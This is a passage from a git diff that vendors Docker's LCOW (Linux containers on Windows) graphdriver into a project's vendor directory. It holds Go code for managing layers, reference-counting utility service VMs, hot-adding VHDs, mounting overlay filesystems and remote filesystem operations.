populating the cache. + // Non-default size we don't store, just create them one-off so no need to lock the cachedSandboxMutex. + if sandboxSize == client.DefaultVhdxSizeGB { + logrus.Debugf("%s: locking cachedSandboxMutex for creation", title) + d.cachedSandboxMutex.Lock() + defer func() { + logrus.Debugf("%s: releasing cachedSandboxMutex for creation", title) + d.cachedSandboxMutex.Unlock() + }() + } + + // Make sure we don't write to our local cached copy if this is for a non-default size request. + targetCacheFile := d.cachedSandboxFile + if sandboxSize != client.DefaultVhdxSizeGB { + targetCacheFile = "" + } + + // Create the ext4 vhdx + logrus.Debugf("%s: creating sandbox ext4 vhdx", title) + if err := svm.createExt4VHDX(filepath.Join(d.dir(id), sandboxFilename), uint32(sandboxSize), targetCacheFile); err != nil { + logrus.Debugf("%s: failed to create sandbox vhdx for %s: %s", title, id, err) + return err + } + return nil +} + +// Create creates the folder for the layer with the given id, and +// adds it to the layer chain. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + logrus.Debugf("lcowdriver: create: id %s parent: %s", id, parent) + + parentChain, err := d.getLayerChain(parent) + if err != nil { + return err + } + + var layerChain []string + if parent != "" { + if !d.Exists(parent) { + return fmt.Errorf("lcowdriver: cannot create layer folder with missing parent %s", parent) + } + layerChain = []string{d.dir(parent)} + } + layerChain = append(layerChain, parentChain...) + + // Make sure layers are created with the correct ACL so that VMs can access them. + layerPath := d.dir(id) + logrus.Debugf("lcowdriver: create: id %s: creating %s", id, layerPath) + if err := system.MkdirAllWithACL(layerPath, 755, system.SddlNtvmAdministratorsLocalSystem); err != nil { + return err + } + + if err := d.setLayerChain(id, layerChain); err != nil { + if err2 := os.RemoveAll(layerPath); err2 != nil { + logrus.Warnf("failed to remove layer %s: %s", layerPath, err2) + } + return err + } + logrus.Debugf("lcowdriver: create: id %s: success", id) + + return nil +} + +// Remove unmounts and removes the dir information. +func (d *Driver) Remove(id string) error { + logrus.Debugf("lcowdriver: remove: id %s", id) + tmpID := fmt.Sprintf("%s-removing", id) + tmpLayerPath := d.dir(tmpID) + layerPath := d.dir(id) + + logrus.Debugf("lcowdriver: remove: id %s: layerPath %s", id, layerPath) + + // Unmount all the layers + err := d.Put(id) + if err != nil { + logrus.Debugf("lcowdriver: remove id %s: failed to unmount: %s", id, err) + return err + } + + // for non-global case just kill the vm + if !d.globalMode { + if err := d.terminateServiceVM(id, fmt.Sprintf("Remove %s", id), true); err != nil { + return err + } + } + + if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) { + return err + } + + if err := os.RemoveAll(tmpLayerPath); err != nil { + return err + } + + logrus.Debugf("lcowdriver: remove: id %s: layerPath %s succeeded", id, layerPath) + return nil +} + +// Get returns the rootfs path for the id. It is reference counted and +// effectively can be thought of as a "mount the layer into the utility +// vm if it isn't already". The contract from the caller of this is that +// all Gets and Puts are matched. It -should- be the case that on cleanup, +// nothing is mounted. +// +// For optimisation, we don't actually mount the filesystem (which in our +// case means [hot-]adding it to a service VM. But we track that and defer +// the actual adding to the point we need to access it. +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { + title := fmt.Sprintf("lcowdriver: get: %s", id) + logrus.Debugf(title) + + // Generate the mounts needed for the defered operation. + disks, err := d.getAllMounts(id) + if err != nil { + logrus.Debugf("%s failed to get all layer details for %s: %s", title, d.dir(id), err) + return nil, fmt.Errorf("%s failed to get layer details for %s: %s", title, d.dir(id), err) + } + + logrus.Debugf("%s: got layer mounts: %+v", title, disks) + return &lcowfs{ + root: unionMountName(disks), + d: d, + mappedDisks: disks, + vmID: d.getVMID(id), + }, nil +} + +// Put does the reverse of get. If there are no more references to +// the layer, it unmounts it from the utility VM. +func (d *Driver) Put(id string) error { + title := fmt.Sprintf("lcowdriver: put: %s", id) + + // Get the service VM that we need to remove from + svm, err := d.serviceVms.get(d.getVMID(id)) + if err == errVMUnknown { + return nil + } else if err == errVMisTerminating { + return svm.getStopError() + } + + // Generate the mounts that Get() might have mounted + disks, err := d.getAllMounts(id) + if err != nil { + logrus.Debugf("%s failed to get all layer details for %s: %s", title, d.dir(id), err) + return fmt.Errorf("%s failed to get layer details for %s: %s", title, d.dir(id), err) + } + + // Now, we want to perform the unmounts, hot-remove and stop the service vm. + // We want to go though all the steps even if we have an error to clean up properly + err = svm.deleteUnionMount(unionMountName(disks), disks...) + if err != nil { + logrus.Debugf("%s failed to delete union mount %s: %s", title, id, err) + } + + err1 := svm.hotRemoveVHDs(disks...) + if err1 != nil { + logrus.Debugf("%s failed to hot remove vhds %s: %s", title, id, err) + if err == nil { + err = err1 + } + } + + err1 = d.terminateServiceVM(id, fmt.Sprintf("Put %s", id), false) + if err1 != nil { + logrus.Debugf("%s failed to terminate service vm %s: %s", title, id, err1) + if err == nil { + err = err1 + } + } + logrus.Debugf("Put succeeded on id %s", id) + return err +} + +// Cleanup ensures the information the driver stores is properly removed. +// We use this opportunity to cleanup any -removing folders which may be +// still left if the daemon was killed while it was removing a layer. +func (d *Driver) Cleanup() error { + title := "lcowdriver: cleanup" + + items, err := ioutil.ReadDir(d.dataRoot) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + // Note we don't return an error below - it's possible the files + // are locked. However, next time around after the daemon exits, + // we likely will be able to to cleanup successfully. Instead we log + // warnings if there are errors. + for _, item := range items { + if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") { + if err := os.RemoveAll(filepath.Join(d.dataRoot, item.Name())); err != nil { + logrus.Warnf("%s failed to cleanup %s: %s", title, item.Name(), err) + } else { + logrus.Infof("%s cleaned up %s", title, item.Name()) + } + } + } + + // Cleanup any service VMs we have running, along with their scratch spaces. + // We don't take the lock for this as it's taken in terminateServiceVm. + for k, v := range d.serviceVms.svms { + logrus.Debugf("%s svm entry: %s: %+v", title, k, v) + d.terminateServiceVM(k, "cleanup", true) + } + + return nil +} + +// Diff takes a layer (and it's parent layer which may be null, but +// is ignored by this implementation below) and returns a reader for +// a tarstream representing the layers contents. The id could be +// a read-only "layer.vhd" or a read-write "sandbox.vhdx". The semantics +// of this function dictate that the layer is already mounted. +// However, as we do lazy mounting as a performance optimisation, +// this will likely not be the case. +func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) { + title := fmt.Sprintf("lcowdriver: diff: %s", id) + + // Get VHDX info + ld, err := getLayerDetails(d.dir(id)) + if err != nil { + logrus.Debugf("%s: failed to get vhdx information of %s: %s", title, d.dir(id), err) + return nil, err + } + + // Start the SVM with a mapped virtual disk. Note that if the SVM is + // already running and we are in global mode, this will be + // hot-added. + mvd := hcsshim.MappedVirtualDisk{ + HostPath: ld.filename, + ContainerPath: hostToGuest(ld.filename), + CreateInUtilityVM: true, + ReadOnly: true, + } + + logrus.Debugf("%s: starting service VM", title) + svm, err := d.startServiceVMIfNotRunning(id, []hcsshim.MappedVirtualDisk{mvd}, fmt.Sprintf("diff %s", id)) + if err != nil { + return nil, err + } + + logrus.Debugf("lcowdriver: diff: waiting for svm to finish booting") + err = svm.getStartError() + if err != nil { + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil, fmt.Errorf("lcowdriver: diff: svm failed to boot: %s", err) + } + + // Obtain the tar stream for it + logrus.Debugf("%s: %s %s, size %d, ReadOnly %t", title, ld.filename, mvd.ContainerPath, ld.size, ld.isSandbox) + tarReadCloser, err := svm.config.VhdToTar(mvd.HostPath, mvd.ContainerPath, ld.isSandbox, ld.size) + if err != nil { + svm.hotRemoveVHDs(mvd) + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil, fmt.Errorf("%s failed to export layer to tar stream for id: %s, parent: %s : %s", title, id, parent, err) + } + + logrus.Debugf("%s id %s parent %s completed successfully", title, id, parent) + + // In safe/non-global mode, we can't tear down the service VM until things have been read. + return ioutils.NewReadCloserWrapper(tarReadCloser, func() error { + tarReadCloser.Close() + svm.hotRemoveVHDs(mvd) + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil + }), nil +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. The layer should not be mounted when calling +// this function. Another way of describing this is that ApplyDiff writes +// to a new layer (a VHD in LCOW) the contents of a tarstream it's given. +func (d *Driver) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + logrus.Debugf("lcowdriver: applydiff: id %s", id) + + svm, err := d.startServiceVMIfNotRunning(id, nil, fmt.Sprintf("applydiff %s", id)) + if err != nil { + return 0, err + } + defer d.terminateServiceVM(id, fmt.Sprintf("applydiff %s", id), false) + + logrus.Debugf("lcowdriver: applydiff: waiting for svm to finish booting") + err = svm.getStartError() + if err != nil { + return 0, fmt.Errorf("lcowdriver: applydiff: svm failed to boot: %s", err) + } + + // TODO @jhowardmsft - the retries are temporary to overcome platform reliability issues. + // Obviously this will be removed as platform bugs are fixed. + retries := 0 + for { + retries++ + size, err := svm.config.TarToVhd(filepath.Join(d.dataRoot, id, layerFilename), diff) + if err != nil { + if retries <= 10 { + continue + } + return 0, err + } + return size, err + } +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +// The layer should not be mounted when calling this function. +func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { + logrus.Debugf("lcowdriver: changes: id %s parent %s", id, parent) + // TODO @gupta-ak. Needs implementation with assistance from service VM + return nil, nil +} + +// DiffSize calculates the changes between the specified layer +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (d *Driver) DiffSize(id, parent string) (size int64, err error) { + logrus.Debugf("lcowdriver: diffsize: id %s", id) + // TODO @gupta-ak. Needs implementation with assistance from service VM + return 0, nil +} + +// GetMetadata returns custom driver information. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + logrus.Debugf("lcowdriver: getmetadata: id %s", id) + m := make(map[string]string) + m["dir"] = d.dir(id) + return m, nil +} + +// GetLayerPath gets the layer path on host (path to VHD/VHDX) +func (d *Driver) GetLayerPath(id string) (string, error) { + return d.dir(id), nil +} + +// dir returns the absolute path to the layer. +func (d *Driver) dir(id string) string { + return filepath.Join(d.dataRoot, filepath.Base(id)) +} + +// getLayerChain returns the layer chain information. +func (d *Driver) getLayerChain(id string) ([]string, error) { + jPath := filepath.Join(d.dir(id), "layerchain.json") + logrus.Debugf("lcowdriver: getlayerchain: id %s json %s", id, jPath) + content, err := ioutil.ReadFile(jPath) + if os.IsNotExist(err) { + return nil, nil + } else if err != nil { + return nil, fmt.Errorf("lcowdriver: getlayerchain: %s unable to read layerchain file %s: %s", id, jPath, err) + } + + var layerChain []string + err = json.Unmarshal(content, &layerChain) + if err != nil { + return nil, fmt.Errorf("lcowdriver: getlayerchain: %s failed to unmarshall layerchain file %s: %s", id, jPath, err) + } + return layerChain, nil +} + +// setLayerChain stores the layer chain information on disk. +func (d *Driver) setLayerChain(id string, chain []string) error { + content, err := json.Marshal(&chain) + if err != nil { + return fmt.Errorf("lcowdriver: setlayerchain: %s failed to marshall layerchain json: %s", id, err) + } + + jPath := filepath.Join(d.dir(id), "layerchain.json") + logrus.Debugf("lcowdriver: setlayerchain: id %s json %s", id, jPath) + err = ioutil.WriteFile(jPath, content, 0600) + if err != nil { + return fmt.Errorf("lcowdriver: setlayerchain: %s failed to write layerchain file: %s", id, err) + } + return nil +} + +// getLayerDetails is a utility for getting a file name, size and indication of +// sandbox for a VHD(x) in a folder. A read-only layer will be layer.vhd. A +// read-write layer will be sandbox.vhdx. +func getLayerDetails(folder string) (*layerDetails, error) { + var fileInfo os.FileInfo + ld := &layerDetails{ + isSandbox: false, + filename: filepath.Join(folder, layerFilename), + } + + fileInfo, err := os.Stat(ld.filename) + if err != nil { + ld.filename = filepath.Join(folder, sandboxFilename) + if fileInfo, err = os.Stat(ld.filename); err != nil { + return nil, fmt.Errorf("failed to locate layer or sandbox in %s", folder) + } + ld.isSandbox = true + } + ld.size = fileInfo.Size() + + return ld, nil +} + +func (d *Driver) getAllMounts(id string) ([]hcsshim.MappedVirtualDisk, error) { + layerChain, err := d.getLayerChain(id) + if err != nil { + return nil, err + } + layerChain = append([]string{d.dir(id)}, layerChain...) + + logrus.Debugf("getting all layers: %v", layerChain) + disks := make([]hcsshim.MappedVirtualDisk, len(layerChain), len(layerChain)) + for i := range layerChain { + ld, err := getLayerDetails(layerChain[i]) + if err != nil { + logrus.Debugf("Failed to get LayerVhdDetails from %s: %s", layerChain[i], err) + return nil, err + } + disks[i].HostPath = ld.filename + disks[i].ContainerPath = hostToGuest(ld.filename) + disks[i].CreateInUtilityVM = true + disks[i].ReadOnly = !ld.isSandbox + } + return disks, nil +} + +func hostToGuest(hostpath string) string { + return fmt.Sprintf("/tmp/%s", filepath.Base(filepath.Dir(hostpath))) +} + +func unionMountName(disks []hcsshim.MappedVirtualDisk) string { + return fmt.Sprintf("%s-mount", disks[0].ContainerPath) +} + +type nopCloser struct { + io.Reader +} + +func (nopCloser) Close() error { + return nil +} + +type fileGetCloserFromSVM struct { + id string + svm *serviceVM + mvd *hcsshim.MappedVirtualDisk + d *Driver +} + +func (fgc *fileGetCloserFromSVM) Close() error { + if fgc.svm != nil { + if fgc.mvd != nil { + if err := fgc.svm.hotRemoveVHDs(*fgc.mvd); err != nil { + // We just log this as we're going to tear down the SVM imminently unless in global mode + logrus.Errorf("failed to remove mvd %s: %s", fgc.mvd.ContainerPath, err) + } + } + } + if fgc.d != nil && fgc.svm != nil && fgc.id != "" { + if err := fgc.d.terminateServiceVM(fgc.id, fmt.Sprintf("diffgetter %s", fgc.id), false); err != nil { + return err + } + } + return nil +} + +func (fgc *fileGetCloserFromSVM) Get(filename string) (io.ReadCloser, error) { + errOut := &bytes.Buffer{} + outOut := &bytes.Buffer{} + file := path.Join(fgc.mvd.ContainerPath, filename) + if err := fgc.svm.runProcess(fmt.Sprintf("cat %s", file), nil, outOut, errOut); err != nil { + logrus.Debugf("cat %s failed: %s", file, errOut.String()) + return nil, err + } + return nopCloser{bytes.NewReader(outOut.Bytes())}, nil +} + +// DiffGetter returns a FileGetCloser that can read files from the directory that +// contains files for the layer differences. Used for direct access for tar-split. +func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + title := fmt.Sprintf("lcowdriver: diffgetter: %s", id) + logrus.Debugf(title) + + ld, err := getLayerDetails(d.dir(id)) + if err != nil { + logrus.Debugf("%s: failed to get vhdx information of %s: %s", title, d.dir(id), err) + return nil, err + } + + // Start the SVM with a mapped virtual disk. Note that if the SVM is + // already running and we are in global mode, this will be hot-added. + mvd := hcsshim.MappedVirtualDisk{ + HostPath: ld.filename, + ContainerPath: hostToGuest(ld.filename), + CreateInUtilityVM: true, + ReadOnly: true, + } + + logrus.Debugf("%s: starting service VM", title) + svm, err := d.startServiceVMIfNotRunning(id, []hcsshim.MappedVirtualDisk{mvd}, fmt.Sprintf("diffgetter %s", id)) + if err != nil { + return nil, err + } + + logrus.Debugf("%s: waiting for svm to finish booting", title) + err = svm.getStartError() + if err != nil { + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil, fmt.Errorf("%s: svm failed to boot: %s", title, err) + } + + return &fileGetCloserFromSVM{ + id: id, + svm: svm, + mvd: &mvd, + d: d}, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go new file mode 100644 index 0000000000..9a27ac9496 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go @@ -0,0 +1,378 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "errors" + "fmt" + "io" + "strings" + "sync" + "time" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/client" + "github.com/sirupsen/logrus" +) + +// Code for all the service VM management for the LCOW graphdriver + +var errVMisTerminating = errors.New("service VM is shutting down") +var errVMUnknown = errors.New("service vm id is unknown") +var errVMStillHasReference = errors.New("Attemping to delete a VM that is still being used") + +// serviceVMMap is the struct representing the id -> service VM mapping. +type serviceVMMap struct { + sync.Mutex + svms map[string]*serviceVMMapItem +} + +// serviceVMMapItem is our internal structure representing an item in our +// map of service VMs we are maintaining. +type serviceVMMapItem struct { + svm *serviceVM // actual service vm object + refCount int // refcount for VM +} + +type serviceVM struct { + sync.Mutex // Serialises operations being performed in this service VM. + scratchAttached bool // Has a scratch been attached? + config *client.Config // Represents the service VM item. + + // Indicates that the vm is started + startStatus chan interface{} + startError error + + // Indicates that the vm is stopped + stopStatus chan interface{} + stopError error + + attachedVHDs map[string]int // Map ref counting all the VHDS we've hot-added/hot-removed. + unionMounts map[string]int // Map ref counting all the union filesystems we mounted. +} + +// add will add an id to the service vm map. There are three cases: +// - entry doesn't exist: +// - add id to map and return a new vm that the caller can manually configure+start +// - entry does exist +// - return vm in map and increment ref count +// - entry does exist but the ref count is 0 +// - return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop +func (svmMap *serviceVMMap) add(id string) (svm *serviceVM, alreadyExists bool, err error) { + svmMap.Lock() + defer svmMap.Unlock() + if svm, ok := svmMap.svms[id]; ok { + if svm.refCount == 0 { + return svm.svm, true, errVMisTerminating + } + svm.refCount++ + return svm.svm, true, nil + } + + // Doesn't exist, so create an empty svm to put into map and return + newSVM := &serviceVM{ + startStatus: make(chan interface{}), + stopStatus: make(chan interface{}), + attachedVHDs: make(map[string]int), + unionMounts: make(map[string]int), + config: &client.Config{}, + } + svmMap.svms[id] = &serviceVMMapItem{ + svm: newSVM, + refCount: 1, + } + return newSVM, false, nil +} + +// get will get the service vm from the map. There are three cases: +// - entry doesn't exist: +// - return errVMUnknown +// - entry does exist +// - return vm with no error +// - entry does exist but the ref count is 0 +// - return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop +func (svmMap *serviceVMMap) get(id string) (*serviceVM, error) { + svmMap.Lock() + defer svmMap.Unlock() + svm, ok := svmMap.svms[id] + if !ok { + return nil, errVMUnknown + } + if svm.refCount == 0 { + return svm.svm, errVMisTerminating + } + return svm.svm, nil +} + +// decrementRefCount decrements the ref count of the given ID from the map. There are four cases: +// - entry doesn't exist: +// - return errVMUnknown +// - entry does exist but the ref count is 0 +// - return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop +// - entry does exist but ref count is 1 +// - return vm and set lastRef to true. The caller can then stop the vm, delete the id from this map +// - and execute svm.signalStopFinished to signal the threads that the svm has been terminated. +// - entry does exist and ref count > 1 +// - just reduce ref count and return svm +func (svmMap *serviceVMMap) decrementRefCount(id string) (_ *serviceVM, lastRef bool, _ error) { + svmMap.Lock() + defer svmMap.Unlock() + + svm, ok := svmMap.svms[id] + if !ok { + return nil, false, errVMUnknown + } + if svm.refCount == 0 { + return svm.svm, false, errVMisTerminating + } + svm.refCount-- + return svm.svm, svm.refCount == 0, nil +} + +// setRefCountZero works the same way as decrementRefCount, but sets ref count to 0 instead of decrementing it. +func (svmMap *serviceVMMap) setRefCountZero(id string) (*serviceVM, error) { + svmMap.Lock() + defer svmMap.Unlock() + + svm, ok := svmMap.svms[id] + if !ok { + return nil, errVMUnknown + } + if svm.refCount == 0 { + return svm.svm, errVMisTerminating + } + svm.refCount = 0 + return svm.svm, nil +} + +// deleteID deletes the given ID from the map. If the refcount is not 0 or the +// VM does not exist, then this function returns an error. +func (svmMap *serviceVMMap) deleteID(id string) error { + svmMap.Lock() + defer svmMap.Unlock() + svm, ok := svmMap.svms[id] + if !ok { + return errVMUnknown + } + if svm.refCount != 0 { + return errVMStillHasReference + } + delete(svmMap.svms, id) + return nil +} + +func (svm *serviceVM) signalStartFinished(err error) { + svm.Lock() + svm.startError = err + svm.Unlock() + close(svm.startStatus) +} + +func (svm *serviceVM) getStartError() error { + <-svm.startStatus + svm.Lock() + defer svm.Unlock() + return svm.startError +} + +func (svm *serviceVM) signalStopFinished(err error) { + svm.Lock() + svm.stopError = err + svm.Unlock() + close(svm.stopStatus) +} + +func (svm *serviceVM) getStopError() error { + <-svm.stopStatus + svm.Lock() + defer svm.Unlock() + return svm.stopError +} + +// hotAddVHDs waits for the service vm to start and then attaches the vhds. +func (svm *serviceVM) hotAddVHDs(mvds ...hcsshim.MappedVirtualDisk) error { + if err := svm.getStartError(); err != nil { + return err + } + return svm.hotAddVHDsAtStart(mvds...) +} + +// hotAddVHDsAtStart works the same way as hotAddVHDs but does not wait for the VM to start. +func (svm *serviceVM) hotAddVHDsAtStart(mvds ...hcsshim.MappedVirtualDisk) error { + svm.Lock() + defer svm.Unlock() + for i, mvd := range mvds { + if _, ok := svm.attachedVHDs[mvd.HostPath]; ok { + svm.attachedVHDs[mvd.HostPath]++ + continue + } + + if err := svm.config.HotAddVhd(mvd.HostPath, mvd.ContainerPath, mvd.ReadOnly, !mvd.AttachOnly); err != nil { + svm.hotRemoveVHDsNoLock(mvds[:i]...) + return err + } + svm.attachedVHDs[mvd.HostPath] = 1 + } + return nil +} + +// hotRemoveVHDs waits for the service vm to start and then removes the vhds. +// The service VM must not be locked when calling this function. +func (svm *serviceVM) hotRemoveVHDs(mvds ...hcsshim.MappedVirtualDisk) error { + if err := svm.getStartError(); err != nil { + return err + } + svm.Lock() + defer svm.Unlock() + return svm.hotRemoveVHDsNoLock(mvds...) +} + +// hotRemoveVHDsNoLock removes VHDs from a service VM. When calling this function, +// the contract is the service VM lock must be held. +func (svm *serviceVM) hotRemoveVHDsNoLock(mvds ...hcsshim.MappedVirtualDisk) error { + var retErr error + for _, mvd := range mvds { + if _, ok := svm.attachedVHDs[mvd.HostPath]; !ok { + // We continue instead of returning an error if we try to hot remove a non-existent VHD. + // This is because one of the callers of the function is graphdriver.Put(). Since graphdriver.Get() + // defers the VM start to the first operation, it's possible that nothing have been hot-added + // when Put() is called. To avoid Put returning an error in that case, we simply continue if we + // don't find the vhd attached. + continue + } + + if svm.attachedVHDs[mvd.HostPath] > 1 { + svm.attachedVHDs[mvd.HostPath]-- + continue + } + + // last VHD, so remove from VM and map + if err := svm.config.HotRemoveVhd(mvd.HostPath); err == nil { + delete(svm.attachedVHDs, mvd.HostPath) + } else { + // Take note of the error, but still continue to remove the other VHDs + logrus.Warnf("Failed to hot remove %s: %s", mvd.HostPath, err) + if retErr == nil { + retErr = err + } + } + } + return retErr +} + +func (svm *serviceVM) createExt4VHDX(destFile string, sizeGB uint32, cacheFile string) error { + if err := svm.getStartError(); err != nil { + return err + } + + svm.Lock() + defer svm.Unlock() + return svm.config.CreateExt4Vhdx(destFile, sizeGB, cacheFile) +} + +func (svm *serviceVM) createUnionMount(mountName string, mvds ...hcsshim.MappedVirtualDisk) (err error) { + if len(mvds) == 0 { + return fmt.Errorf("createUnionMount: error must have at least 1 layer") + } + + if err = svm.getStartError(); err != nil { + return err + } + + svm.Lock() + defer svm.Unlock() + if _, ok := svm.unionMounts[mountName]; ok { + svm.unionMounts[mountName]++ + return nil + } + + var lowerLayers []string + if mvds[0].ReadOnly { + lowerLayers = append(lowerLayers, mvds[0].ContainerPath) + } + + for i := 1; i < len(mvds); i++ { + lowerLayers = append(lowerLayers, mvds[i].ContainerPath) + } + + logrus.Debugf("Doing the overlay mount with union directory=%s", mountName) + if err = svm.runProcess(fmt.Sprintf("mkdir -p %s", mountName), nil, nil, nil); err != nil { + return err + } + + var cmd string + if len(mvds) == 1 { + // `FROM SCRATCH` case and the only layer. No overlay required. + cmd = fmt.Sprintf("mount %s %s", mvds[0].ContainerPath, mountName) + } else if mvds[0].ReadOnly { + // Readonly overlay + cmd = fmt.Sprintf("mount -t overlay overlay -olowerdir=%s %s", + strings.Join(lowerLayers, ","), + mountName) + } else { + upper := fmt.Sprintf("%s/upper", mvds[0].ContainerPath) + work := fmt.Sprintf("%s/work", mvds[0].ContainerPath) + + if err = svm.runProcess(fmt.Sprintf("mkdir -p %s %s", upper, work), nil, nil, nil); err != nil { + return err + } + + cmd = fmt.Sprintf("mount -t overlay overlay -olowerdir=%s,upperdir=%s,workdir=%s %s", + strings.Join(lowerLayers, ":"), + upper, + work, + mountName) + } + + logrus.Debugf("createUnionMount: Executing mount=%s", cmd) + if err = svm.runProcess(cmd, nil, nil, nil); err != nil { + return err + } + + svm.unionMounts[mountName] = 1 + return nil +} + +func (svm *serviceVM) deleteUnionMount(mountName string, disks ...hcsshim.MappedVirtualDisk) error { + if err := svm.getStartError(); err != nil { + return err + } + + svm.Lock() + defer svm.Unlock() + if _, ok := svm.unionMounts[mountName]; !ok { + return nil + } + + if svm.unionMounts[mountName] > 1 { + svm.unionMounts[mountName]-- + return nil + } + + logrus.Debugf("Removing union mount %s", mountName) + if err := svm.runProcess(fmt.Sprintf("umount %s", mountName), nil, nil, nil); err != nil { + return err + } + + delete(svm.unionMounts, mountName) + return nil +} + +func (svm *serviceVM) runProcess(command string, stdin io.Reader, stdout io.Writer, stderr io.Writer) error { + process, err := svm.config.RunProcess(command, stdin, stdout, stderr) + if err != nil { + return err + } + defer process.Close() + + process.WaitTimeout(time.Duration(int(time.Second) * svm.config.UvmTimeoutSeconds)) + exitCode, err := process.ExitCode() + if err != nil { + return err + } + + if exitCode != 0 { + return fmt.Errorf("svm.runProcess: command %s failed with exit code %d", command, exitCode) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go new file mode 100644 index 0000000000..29f15fd24c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go @@ -0,0 +1,139 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "fmt" + "io" + "runtime" + "strings" + "sync" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/service/gcsutils/remotefs" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" + "github.com/sirupsen/logrus" +) + +type lcowfs struct { + root string + d *Driver + mappedDisks []hcsshim.MappedVirtualDisk + vmID string + currentSVM *serviceVM + sync.Mutex +} + +var _ containerfs.ContainerFS = &lcowfs{} + +// ErrNotSupported is an error for unsupported operations in the remotefs +var ErrNotSupported = fmt.Errorf("not supported") + +// Functions to implement the ContainerFS interface +func (l *lcowfs) Path() string { + return l.root +} + +func (l *lcowfs) ResolveScopedPath(path string, rawPath bool) (string, error) { + logrus.Debugf("remotefs.resolvescopedpath inputs: %s %s ", path, l.root) + + arg1 := l.Join(l.root, path) + if !rawPath { + // The l.Join("/", path) will make path an absolute path and then clean it + // so if path = ../../X, it will become /X. + arg1 = l.Join(l.root, l.Join("/", path)) + } + arg2 := l.root + + output := &bytes.Buffer{} + if err := l.runRemoteFSProcess(nil, output, remotefs.ResolvePathCmd, arg1, arg2); err != nil { + return "", err + } + + logrus.Debugf("remotefs.resolvescopedpath success. Output: %s\n", output.String()) + return output.String(), nil +} + +func (l *lcowfs) OS() string { + return "linux" +} + +func (l *lcowfs) Architecture() string { + return runtime.GOARCH +} + +// Other functions that are used by docker like the daemon Archiver/Extractor +func (l *lcowfs) ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error { + logrus.Debugf("remotefs.ExtractArchve inputs: %s %+v", dst, opts) + + tarBuf := &bytes.Buffer{} + if err := remotefs.WriteTarOptions(tarBuf, opts); err != nil { + return fmt.Errorf("failed to marshall tar opts: %s", err) + } + + input := io.MultiReader(tarBuf, src) + if err := l.runRemoteFSProcess(input, nil, remotefs.ExtractArchiveCmd, dst); err != nil { + return fmt.Errorf("failed to extract archive to %s: %s", dst, err) + } + return nil +} + +func (l *lcowfs) ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error) { + logrus.Debugf("remotefs.ArchivePath: %s %+v", src, opts) + + tarBuf := &bytes.Buffer{} + if err := remotefs.WriteTarOptions(tarBuf, opts); err != nil { + return nil, fmt.Errorf("failed to marshall tar opts: %s", err) + } + + r, w := io.Pipe() + go func() { + defer w.Close() + if err := l.runRemoteFSProcess(tarBuf, w, remotefs.ArchivePathCmd, src); err != nil { + logrus.Debugf("REMOTEFS: Failed to extract archive: %s %+v %s", src, opts, err) + } + }() + return r, nil +} + +// Helper functions +func (l *lcowfs) startVM() error { + l.Lock() + defer l.Unlock() + if l.currentSVM != nil { + return nil + } + + svm, err := l.d.startServiceVMIfNotRunning(l.vmID, l.mappedDisks, fmt.Sprintf("lcowfs.startVM")) + if err != nil { + return err + } + + if err = svm.createUnionMount(l.root, l.mappedDisks...); err != nil { + return err + } + l.currentSVM = svm + return nil +} + +func (l *lcowfs) runRemoteFSProcess(stdin io.Reader, stdout io.Writer, args ...string) error { + if err := l.startVM(); err != nil { + return err + } + + // Append remotefs prefix and setup as a command line string + cmd := fmt.Sprintf("%s %s", remotefs.RemotefsCmd, strings.Join(args, " ")) + stderr := &bytes.Buffer{} + if err := l.currentSVM.runProcess(cmd, stdin, stdout, stderr); err != nil { + return err + } + + eerr, err := remotefs.ReadError(stderr) + if eerr != nil { + // Process returned an error so return that. + return remotefs.ExportedToError(eerr) + } + return err +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go new file mode 100644 index 0000000000..1f00bfff46 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go @@ -0,0 +1,211 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "encoding/binary" + "encoding/json" + "fmt" + "io" + "os" + "strconv" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/service/gcsutils/remotefs" + "github.com/containerd/continuity/driver" +) + +type lcowfile struct { + process hcsshim.Process + stdin io.WriteCloser + stdout io.ReadCloser + 